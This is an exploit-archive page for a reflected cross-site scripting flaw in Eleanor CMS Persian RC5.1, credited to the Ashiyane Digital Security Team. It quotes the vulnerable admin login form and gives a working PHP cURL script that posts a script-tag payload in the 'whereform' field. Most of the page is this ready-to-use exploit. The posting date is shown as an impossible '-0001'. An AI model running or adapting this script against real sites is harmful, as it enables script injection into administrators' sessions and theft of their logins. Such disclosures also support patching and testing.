Home / exploits Eleanor_CMS_Persian_Rc5.1 Cross-Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>Eleanor_CMS_Persian_Rc5.1 Cross-Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>===================================================== # Exploit Title: Eleanor_CMS_Persian_Rc5.1 Cross-Site Scripting # Exploit Author: Ashiyane Digital Security Team # Vendor Homepage: http://www.dl.persianscript.ir/script/Eleanor_CMS_Persian_Rc5.1.zip # Tested on: Windows 8, Kali Linux # Date : 27 OCT 2016 ===================================================== # Vulnerable file(url) and code: // Mehod : Post // http://127.0.0.1/path/admin.php <form action="admin.php" method="post"> <div class="wpbox wpbwhite"> <div class="wptop"><b><span> </span></b></div> <div class="wpmid"> <div class="wbpad enterform"> <p> <span>نام کاربری :</span> <input name="user_name" size="10" type="text"> </p> <p> <span>رمز عبور :</span> <input name="pass" size="10" type="password"> </p> </div> </div> <div class="wpbtm"><b><span> </span></b></div> </div> <div class="submitline"> <input name="whereform" value="" type="hidden"> <input class="button" name="submit" value="وارد شدن" type="submit"> </div> </form> ======================================================= # Exploit code: <?php $path ="127.0.0.1/path/"; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "http://$path/admin.php"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "pass=g00dPa%24%24w0rD&user_name=ncxedycj&whereform=1'%22()%26%25<acx><ScRiPt%20>alert('/XSS/')</ScRiPt>"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$path"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> ================================================================================ # Discovered By : M.R.S.L.Y ================================================================================</BODY></HTML>